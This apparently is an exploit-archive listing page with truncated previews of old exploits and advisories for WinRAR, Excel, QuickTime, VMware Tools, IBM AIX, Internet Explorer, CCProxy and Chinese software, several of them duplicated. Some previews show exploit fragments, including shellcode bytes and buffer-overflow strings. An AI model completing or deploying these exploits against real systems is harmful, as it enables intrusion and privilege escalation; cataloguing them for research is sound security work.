CCProxy Telnet Proxy Ping remote stack overflow analysis-vulnerability warning-the black bar safety net

By: mad Dog-B. C. T Simple to understand a bit of the vulnerability reason, the problem lies in the ping, the first to trigger this vulnerability see the effect. Turn on the CC, and then telnet 127.0.0.1 2 3, appeared the following tips CCProxy TelnetCCProxy Telnet Service Ready. CCProxy Telnet...

WinRAR 3.30 Long Filename Buffer Overflow Exploit

No description provided by source. / WinRAR Buffer Overflow 3.30 Exploit Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team Exploit made by: K4P0 Contact: [email protected] / include stdio.h include windows.h int mainvoid char EvilBuff1024; // Normal cmd.exe shellcode...

Microsoft Office Excel 2003 Hlink Stack/SEH Overflow Exploit

No description provided by source. !perl "Microsoft Office Excel 2003" Hlink Stack/SEH Overflow Exploit Author: Manuel Santamarina Suarez The vulnerability was discovered by 'kcope'. First click on the link and then on the "Yes" button to cause the stack overflow...

QuickTime RTSP Response Content-type remote stack rewrite exploit

Everyone Loves O|0+|O the Hypnotoad... |...| | | =o0O=====O0o=============================== | QuickTime RTSP Response Content-type | | remote stack rewrite exploit for IE 6/7 | | by Yag Kohha skyhole at gmail.com | =========================================== Exploit tested on: - Windows Vista -...

Microsoft Windows FTP客户端多个远程溢出漏洞

Microsoft Windows是微软发布的非常流行的操作系统。 Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制客户端。 Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令，如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话，就可以触发缓冲区溢出，导致拒绝服务或执行任意指令。但这个漏洞较难利用，因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。 Microsoft Windows XP Microsoft Windo...

Apple QuickTime 7.2/7.3 RSTP Response Code Exec Exploit (Vista/XP)

No description provided by source. / ============================================================= Apple Quicktime Vista/XP RSTP Response Remote Code Exec ============================================================= Discovered by: h07 Author: InTeL Tested on:...

Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)

No description provided by source. !/usr/bin/python http://www.offensive-security.com Bug discovered by Krystian Kloskowski h07 [email protected] Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista...

aquick-rstp.txt

/ ============================================================= Apple Quicktime Vista/XP RSTP Response Remote Code Exec ============================================================= Discovered by: h07 Author: InTeL Tested on: - Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec -...

Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)

Exploit for unknown platform in category remote exploits ====================================================================== Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit IE7/FF/Opera ====================================================================== !/usr/bin/python...

Apple QuickTime 7.27.3 (Internet Explorer 7 Firefox Opera) - RTSP Response Universal

Apple QuickTime 7.27.3 Internet Explorer 7 Firefox Opera - RTSP Response Universal !/usr/bin/python http://www.offensive-security.com Bug discovered by Krystian Kloskowski h07 Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista This exploit is completely "Universal" .... It h...

Apple QuickTime 7.3 RTSP Response Universal Exploit (Vista / XP)

No description provided by source. !/usr/bin/python Apple QuickTime 7.3 RTSP Response Vista / XPSP2 Universal Bug discovered by Krystian Kloskowski h07 [email protected] Edited by muts - offensive-security.com http://www.offensive-security.com Tested on XP SP2 and Vista EN QuickTime/7.3...

VMware Tools hgfs.sys Local Privilege Escalation Vulnerability Exploit

No description provided by source. / VMware Tools hgfs.sys Local Privilege Escalation Vulnerability Exploit Created by SoBeIt Main file of exploit Tested on: Windows XP PRO SP2 Chinese Windows XP PRO SP2 English...

联众 ConnectAndEnterRoom

No description provided by source. html title7jdg's Blog/title object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" id='target' style='display:none'/object body SCRIPT language="javascript" ...

Microsoft Jet数据库引擎MDB文件解析远程缓冲区溢出漏洞

Microsoft Jet DataBase Engine是一款Access数据库引擎。 Microsoft Jet数据库引擎处理MDB文件时存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 当Microsoft Office Access解析MDB文件时，会调用Jet Engine msjet40.dll来解析它，通过构建恶意的MDB，会触发一个栈的缓冲区溢出： C:\\Windows\\System32\\msjet40.dll, version is 4.0.8618.0 .text:1B0B72BB mov ecx, edx ; ecx=0x5200...

迅雷5 pplayer.dll 组件漏洞

出现严重0-Day漏洞，病毒作者可利用该漏洞编写恶意网页，当用于浏览这些网页的时候，就会感染病毒，进而该病毒可以盗窃用户的帐号和密码，从而使用户遭受到损失。 与上次的不同，这次有漏洞的程序出现在迅雷看看（Thunder KanKan）上，pplayer.dll 组件版本号：1.2.3.49，CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F. 该组件内的一个函数FlvPlayerUrl上，存在边界检查不严格的问题，当向其传递过长参数时，会导致程序溢出。病毒作者可以利用这个缺陷，精心编写Shellcode，溢出，然后可以下载任意恶意病毒文件。 迅雷5...

Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)

No description provided by source. !/usr/bin/perl Microsoft Internet Explorer TIF/TIFF Code Execution MS07-055 Author: grabarz grabarz at grabarz.info Note: This exploit is modified from Hong Gil-Dong, Jeon Woo-chi PoC http://www.milw0rm.com/exploits/4584...

IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit

No description provided by source. setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccddddx2fxf2x28x2f" egg="x60"2350 shellcode= by intropy at caughq.org "x7cxa5x2ax79" xor. r5,r5,r5 "x40x82xffxfd" bnel shellcode "x7fxe8x02xa6" mflr r31...

texinfo-poc.txt

--==+=============================================+==-- --==+ texinfo = 4.9 format string vuln PoC +==-- --==+=============================================+==-- DISCOVERED BY: Cody Rester WEBSITE: www.codyrester.com --==+=============================================+==-- TIMELINE:...

IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation

setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"2350 shellcode= by intropy caughq.org "\x7c\xa5\x2a\x79" xor. r5,r5,r5 "\x40\x82\xff\xfd" bnel "\x7f\xe8\x02\xa6" mflr r31 "\x3b\xff\x01\x20" cal...

setlocate-local.txt

setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"2350 shellcode= by intropy caughq.org "\x7c\xa5\x2a\x79" xor. r5,r5,r5 "\x40\x82\xff\xfd" bnel "\x7f\xe8\x02\xa6" mflr r31 "\x3b\xff\x01\x20" cal...